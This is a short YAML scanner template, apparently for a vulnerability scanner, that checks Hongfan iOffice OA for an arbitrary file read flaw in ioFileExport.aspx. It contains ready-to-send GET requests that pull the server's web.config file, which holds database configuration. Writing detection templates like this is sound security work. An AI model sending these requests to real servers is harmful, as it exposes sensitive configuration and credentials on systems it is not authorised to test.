id: ioffice-oa-iofileexport-read-file

info:
  name: 红帆OA ioFileExport.aspx 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |
    红帆OA ioFileExport.aspx文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器敏感信息
    app="红帆-ioffice"
  reference: 
    - http://wiki.peiqi.tech/wiki/oa/%E7%BA%A2%E5%B8%86OA/%E7%BA%A2%E5%B8%86OA%20ioFileExport.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream
    expression: response.status == 200 && response.body.bcontains(b'<DbConfig>') && response.body.bcontains(b'<configSection>') && response.body.bcontains(b'<iOfficeUpload>')
  r1:
    request:
      method: GET
      path: /ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/Login.aspx&filename=test.txt&ContentType=application/octet-stream
    expression: response.status == 200 && response.body.bcontains(b'<DbConfig>') && response.body.bcontains(b'<configSection>') && response.body.bcontains(b'<iOfficeUpload>')
expression: r0() || r1()